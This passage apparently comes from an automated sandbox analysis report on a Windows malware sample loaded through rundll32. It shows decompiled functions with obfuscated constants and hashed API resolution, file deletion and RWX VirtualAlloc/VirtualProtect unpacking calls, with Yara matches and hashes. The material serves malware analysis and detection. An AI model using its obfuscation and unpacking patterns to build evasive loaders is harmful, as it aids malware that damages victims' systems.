                                                                      • Instruction Fuzzy Hash: DA110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F108599E925A6290D7BA9B15DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E01FFE554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				int _t51;
                                                                      				signed int _t53;
                                                                      				struct _SHFILEOPSTRUCTW* _t57;
                                                                      
                                                                      				_push(_a4);
                                                                      				_t57 = __edx;
                                                                      				_push(__edx);
                                                                      				E02002550(_t42);
                                                                      				_v20 = 0xead4;
                                                                      				_v20 = _v20 + 0xffff9be4;
                                                                      				_v20 = _v20 ^ 0x000085bc;
                                                                      				_v16 = 0x46f7;
                                                                      				_v16 = _v16 << 0xe;
                                                                      				_v16 = _v16 << 7;
                                                                      				_t53 = 0x39;
                                                                      				_v16 = _v16 / _t53;
                                                                      				_v16 = _v16 ^ 0x03e8aab4;
                                                                      				_v12 = 0x2beb;
                                                                      				_v12 = _v12 ^ 0xafae01c3;
                                                                      				_v12 = _v12 + 0xffff58eb;
                                                                      				_v12 = _v12 ^ 0xa5118136;
                                                                      				_v12 = _v12 ^ 0x0abc415f;
                                                                      				_v8 = 0xa691;
                                                                      				_v8 = _v8 ^ 0x7591c523;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 + 0x20df;
                                                                      				_v8 = _v8 ^ 0x458ea297;
                                                                      				E01FF7378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
                                                                      				_t51 = SHFileOperationW(_t57); // executed
                                                                      				return _t51;
                                                                      			}












                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 01FFE60B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: 2e6199d4ae5fc3de9b6a8e90e145e878610145325f5de81443239b371fc658fd
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: 781123B1D01318BBEB18DFA4C8498DEBBB4FF00718F108698E82576250D3B95B44DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E01FFEB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t34;
                                                                      				int _t44;
                                                                      
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t34);
                                                                      				_v8 = 0xd1b2;
                                                                      				_v8 = _v8 * 0x63;
                                                                      				_v8 = _v8 << 4;
                                                                      				_v8 = _v8 * 0x74;
                                                                      				_v8 = _v8 ^ 0x4bec8e88;
                                                                      				_v20 = 0x1fc5;
                                                                      				_v20 = _v20 + 0x9c84;
                                                                      				_v20 = _v20 ^ 0x0000b099;
                                                                      				_v16 = 0x542c;
                                                                      				_v16 = _v16 | 0x3ba7d0a3;
                                                                      				_v16 = _v16 ^ 0x3ba7e6ce;
                                                                      				_v12 = 0x8319;
                                                                      				_v12 = _v12 * 0x45;
                                                                      				_v12 = _v12 + 0xffff39a4;
                                                                      				_v12 = _v12 ^ 0x0022b84c;
                                                                      				E01FF7378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
                                                                      				_t44 = DeleteFileW(_a8); // executed
                                                                      				return _t44;
                                                                      			}










                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 01FFEBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 0837fdfe1ff4a7f1d0ba16b912b85ac3b839edb68c45034b4e407f0f3a21c036
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 3911E3B1C0020DFBDF04DFE4DA4689EBBB4FF40314F608589E914A62A1D7759B549F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E01FFF1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t46;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E02002550(_t46);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x28beb0;
                                                                      				_v16 = 0xe97b;
                                                                      				_v16 = _v16 >> 3;
                                                                      				_t59 = 0x47;
                                                                      				_v16 = _v16 / _t59;
                                                                      				_v16 = _v16 ^ 0x00001a39;
                                                                      				_v12 = 0x2d01;
                                                                      				_v12 = _v12 >> 8;
                                                                      				_t60 = 0x3a;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 ^ 0x000023d3;
                                                                      				_v20 = 0xc5d9;
                                                                      				_v20 = _v20 | 0x3e7a6da8;
                                                                      				_v20 = _v20 ^ 0x3e7ad9f3;
                                                                      				_v8 = 0x3ddd;
                                                                      				_v8 = _v8 >> 7;
                                                                      				_v8 = _v8 + 0xffffadd9;
                                                                      				_v8 = _v8 ^ 0xffff8e91;
                                                                      				E01FF7378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
                                                                      				_t57 = CloseHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}














                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 01FFF2A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: 353913d418cf77cba58a7defb6135635256298b91c9fffab0dc278bfcdf3311a
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 031117B6D0020CEBDF05DFE5C84A9DEBBB5EB14304F108589E91466290D3B55B649F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 02018361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020183A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction ID: 2fb8abeafbd25850d1847d23ab74e2b26dd189ce7a5ab291e14a27953b2249ff
                                                                      • Opcode Fuzzy Hash: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction Fuzzy Hash: 7B110371A413159FE320CF609C847BBB7EDFB05720F448A29ED46D7240D7B1A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 020185E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction ID: 05f922c5d4f62aca0f968dade12ba72a9507ded5927094e839d6e41cdf198bef
                                                                      • Opcode Fuzzy Hash: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction Fuzzy Hash: 4931FEB2E0131AAFEB51DEA4CC84AEF77FCAF55215F008526E915E3200EB75D610DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0201847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction ID: 24fd07a7333b2c82ede915911725371fce972d7bb34ee27942c3877f1b224a10
                                                                      • Opcode Fuzzy Hash: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction Fuzzy Hash: 50112231A813149FE764CF60DC45BA7B7ECFF05320F408A29ED96CB240DBB5A6409BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction ID: f247034f5e4ab2d0d864addda6121c4c8ba2b1696375e6337edc1af0eab8f8ba
                                                                      • Opcode Fuzzy Hash: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction Fuzzy Hash: 2B110331A417159FE760CF618C44BA7B7EEFB06320F448A2AED05C7240D7B6A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020182E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020182F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction ID: 46021d9a412e1b69fcc11bb575feb0f06823cabc93ec4585b1f52fbab1bccd3e
                                                                      • Opcode Fuzzy Hash: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction Fuzzy Hash: 0C01D631641318AFEB044F50DC88B9FBB9AFB40764F88C525F9048B201C376AE109BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020181C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020181CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction ID: d573f4eac87fd3fb5cbe5fdf2bcfe0a121122287d1c26aa6b3925ce7953e5bbb
                                                                      • Opcode Fuzzy Hash: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction Fuzzy Hash: 63016D32A403259BE7509B94D888B67F7DDE741391F84C666ED04CB602C37ADA50DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 02052B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 02052BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 02052BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 02052BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction ID: 538b4ad91935a288d588a3d2b5f6bf92c4be5d1c118b051f32b8b668f4ba3d7f
                                                                      • Opcode Fuzzy Hash: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction Fuzzy Hash: DD2136746043409FEB40DF68C8C0EAAB7F8AF48310F158195ED48CF2A6D775E840DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 02018110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction ID: 0e46f3b322d392e8872acbd612a963bb40dc656fab4e4a6aff8f4a0cea7db47a
                                                                      • Opcode Fuzzy Hash: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction Fuzzy Hash: C9F024339403014AF7804A34CDC4737758EB742334F80CF21E6258A6C1C33E8B00E644
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:937
                                                                      Total number of Limit Nodes:1

                                                                      Graph


                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001BEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001BEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: d4ec2c4b8d7ca32284ee0ef8aadd8eaa76017fb165e723c9a8639b3d5767411f
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 61C18875A002099FCB48CF98C590EEEB7B6BF88314F148159E9199B355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 1be620-1be66b call 1bea10 44 1be67a-1be6aa call 1be390 VirtualAlloc 41->44 45 1be66d-1be677 call 1bea10 41->45 45->44
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001BE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: c244dc4ca5502cf1a60d3aeeee32a4874eb2545764dc38a8e80cb46f571af093
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 6A110060D08289DAEF01D7E894097FEBFB55B21704F044098D5457B282D7BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:936
                                                                      Total number of Limit Nodes:1

                                                                      Graph


                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 005AEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 005AEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_590000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 0b9d4f271a1f1bda07fb22ad80eaf09bfff76d1b03a3bdf39baf470ffb6350d6
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: F0C1A9B5A00209DFCB48CF88C591EAEBBB5BF88314F148159E909AB355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 5ae620-5ae66b call 5aea10 44 5ae67a-5ae6aa call 5ae390 VirtualAlloc 41->44 45 5ae66d-5ae677 call 5aea10 41->45 45->44
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 005AE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_590000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 6e490d7f766e37e96030d19bd435a198ec520fe2d0bc729b235bdb8bbeb556a1
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 4E114260D082C9DEEF01D7E8980A7FFBFB56F11704F044098D5446B282D2BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:1.7%
                                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:73
                                                                      Total number of Limit Nodes:5

                                                                      Graph


                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 463928-4639b4 call 4479dc 51 4639b6 46->51 52 4639bd-4639cf GetEnhMetaFileA 46->52 51->52 54 4639d1 52->54 55 4639d8-4639ec 52->55 54->55 56 463a0e-463ac5 VirtualAlloc 55->56 57 4639ee-463a0c 55->57 65 463acf-463ada 56->65 57->56 66 463b21-463b33 65->66 67 463adc-463b1f 65->67 68 463b75-463bac 66->68 69 463b35-463b73 66->69 67->65 69->68 69->69
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 71 4104c7-410565 call 407378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E004104C7() {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _t48;
                                                                      				signed int _t49;
                                                                      
                                                                      				_v8 = 0xb3b9;
                                                                      				_v8 = _v8 + 0x1dd8;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x000002ef;
                                                                      				_v20 = 0x5082;
                                                                      				_t48 = 0xc;
                                                                      				_v20 = _v20 / _t48;
                                                                      				_v20 = _v20 ^ 0x00006c35;
                                                                      				_v12 = 0x710;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_t49 = 0x6d;
                                                                      				_v12 = _v12 / _t49;
                                                                      				_v12 = _v12 ^ 0x0000532a;
                                                                      				_v16 = 0x5a4c;
                                                                      				_v16 = _v16 ^ 0xca4a1f4d;
                                                                      				_v16 = _v16 ^ 0xca4a24cd;
                                                                      				E00407378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
                                                                      				ExitProcess(0);
                                                                      			}









                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00410560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: 8a4a50fccc019cea45a05ef1885fd17a53ef087f713c54163174b183f339ab60
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 2311F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B54CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 461638-461641 75 461643 74->75 76 46164b-4616d1 DdeInitializeA call 461328 call 461a14 74->76 75->76 86 4616d6-4616eb 76->86
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
